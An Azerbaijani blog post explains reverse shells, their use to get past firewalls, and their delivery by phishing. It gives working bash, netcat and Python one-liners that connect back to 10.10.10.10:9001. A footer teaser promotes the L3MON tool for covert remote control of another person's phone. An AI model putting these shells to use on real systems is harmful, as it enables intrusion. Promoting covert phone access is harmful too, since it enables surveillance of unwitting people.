Ana içeriğe atla

Reverse Shell nədir? Necə edilir?

Qurbanın kompüterində işə salındıqda hackerin dinlədiyi porta qoşulma sorğusu göndərən və hackerin () qurbanın kompüterində əmrləri yerinə yetirməsinə imkan verən skriptlərə reverse shell əmrləri deyilir. Pentest  zamanı əmrlərin icrası ilə bağlı zəifliyi tapmaq şansınız varsa, çox güman ki, qısa müddət sonra shell istifadə edərək sistemə giriş əldə edəcəksiniz. Yeni hesab / SSH açarı / .rhosts faylı əlavə etmək mümkün deyilsə, növbəti addımınız reverse shell istifadə etmək və ya qabığı TCP portuna qoşmaq olacaq.


Firewalllar portlara nəzarət edə bilər. Məsələn, xarici şəbəkədən DMZ şəbəkəsinə gələrkən 80 və 443 nömrəli portlara, daxili şəbəkəni xarici şəbəkəyə buraxarkən 53, 80 və 443 nömrəli portlara icazə verilir. Xarici şəbəkədən daxili şəbəkəyə gələn bütün sorğular bloklansın bu halda  daxili şəbəkədən xarici şəbəkəyə sorğuların keçməsinə imkan verən portlardan birindən xarici şəbəkəyə qoşulma həyata keçirilərsə, firewall bu IP ünvanını bloklamayacaq və ondan sorğuları qəbul edəcək. Reverse shell kənar şəbəkədən daxil olan bağlantıların bloklandığı halda firewall qaydalarından yayınmaq üçün istifadə olunur


Reverse shell ilə bağlı vacib məqamlardan biri də əlaqənin içəridən başladığı məlumatıdır. Bunun üçün qurbana fişinq hücumundan istifadə olunur. Burada vacib məqam reverse shell  olan faylı işə salmaqdır. Fayl işə salındıqda, daxili şəbəkədən xarici şəbəkədə göstərilən IP ünvanının müəyyən edilmiş portuna qoşulmağa cəhd edilir. Bağlantı qurulduqda, firewallun status xüsusiyyətindən istifadə edərək eyni əlaqə üzərindən reverse shell başlanır və beləliklə hədəf cihazda shell əldə edilir


videoda shell almaq üçün bash-dan istifadə edilib dinləmə üçün isə netcat


dinləmə nc -lvnp PORT


shell almaq üçün başqa üsullar:


bash -i >& /dev/tcp/10.10.10.10/9001 0>&1


nc 10.10.10.10 9001 -e bash


export RHOST="10.10.10.10";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

Bu blogdaki popüler yayınlar

Zərərli Proqram Təminatları (Malware-lər)

  Zərərli Proqram Təminatları   ( Mal icious Soft ware s/ Malware) Viruslar Öz-özünü kopyalaya bilən və yayılaraq sistemi dəyişdirə bilər proqram təminatlarıdır. Yəni hər malware virus deyil. Başladılmağa ehtiyacları var ; Bu başlatmaq o demək deyil ki, yalnız qurban tərəfindən olsun, hansısa proqram təminatı tərəfindəndə ola bilər. Başladılana qədər səssiz gözləyirlər. Virus növü Funksiyası Boot                            Əməliyyat sisteminin açılışında işləyərək özünü yükləyir. Web Scripting Veb saytları və brauzerindəki boşluqları istismar edir. Hijacker                                   Veb brauzer funksiyalarının ələ keçirərək fərqli səhifələrə yönləndirir. Resident RAM-a yerləşərək qalıcılıq təşkil edir. Polymorphic Antivirustan qaçmaq üçün kodunu hər açılışda yeniləyir. Makro (VBA) Öz kodunu fayllara əla

Linux Dərsləri 2

 LİNUX DƏRSLƏRİ 2 Lazımi mühitin qurulması Linux əməliyyat sistemini quraşdırmaq və ya heç bir quraşdırma prosesi olmadan Linux-dan istifadə etmək üçün bir çox variant var. Bilmədiyiniz alternativ variant olması ehtimalı üçün aşağıda ümumi istifadə variantlarını sadalayıram. Quraşdırma və İstifadə Metodları: Virtual quraşdırma (Vmware və Virtualbox) İkinci əməliyyat sistemi kimi quraşdırma (Dualboot) Onu canlı versiya kimi istifadə edin. (Bütün paylamalarda bu xüsusiyyət yoxdur.) Linux VPS vasitəsilə istifadə. Virtual istifadə; Virtuallaşdırma prosesi qısaca; Bu o deməkdir ki, quraşdırmaq istədiyiniz yeni əməliyyat sistemini virtuallaşdırma texnologiyası ilə diskə daimi quraşdırmaya ehtiyac olmadan mövcud əməliyyat sistemi üzərində işlədə bilərsiniz. Virtuallaşdırma texnologiyası sayəsində istifadə etdiyiniz əməliyyat sistemindən çıxmadan, eynilə bir proqramı işlətmək kimi; Demək olar ki, istənilən əməliyyat sistemini işlədə bilərsiniz. Virtuallaşdırma prosesi; bu iş üçün hazırlanmış

Başqasının telefonun idarə etmək

  ƏLAQƏ:  @Shirinov039 TELEGRAM KANALIM:  TECHMOON Bugünün makalesinde, telefonun gizli uzaktan kumanda edilen araçları incelemeye başlayacağız.   Size bir akıllı telefon L3MON'a   uzaktan erişim için ücretsiz bir araç tanıtacağım . Kali Linux üzerinde L3MON'un nasıl kurulacağını, yapılandırılacağını ve kullanılacağını göstereceğim. Windows kullanıcıları Kali Linux kelimesinden korkmamalıdır.  Kali Linux'u Windows'a  kolay ve hızlı bir şekilde kurmak uzun zamandır mümkündür. L3MON ile gizli uzaktan telefon erişimi​ L3MON, Android telefona gizli uzaktan erişim için ücretsiz, açık kaynaklı bir araçtır. Kontrol paneli kullanılarak bir yük (APK dosyası) oluşturulur. APK dosyası hedef cihaza yüklendikten sonra telefona erişebileceksiniz. Hedef cihazla etkileşim, web arayüzü kullanılarak gerçekleşir. L3MON'un Özellikleri: Konum belirleme. Mikrofondan kayıt. Kişileri görüntüle SMS'i görüntüleyin ve gönderin. Arama geçmişi. Yüklü uygulamaları görüntüleyin. Pano. Bildiri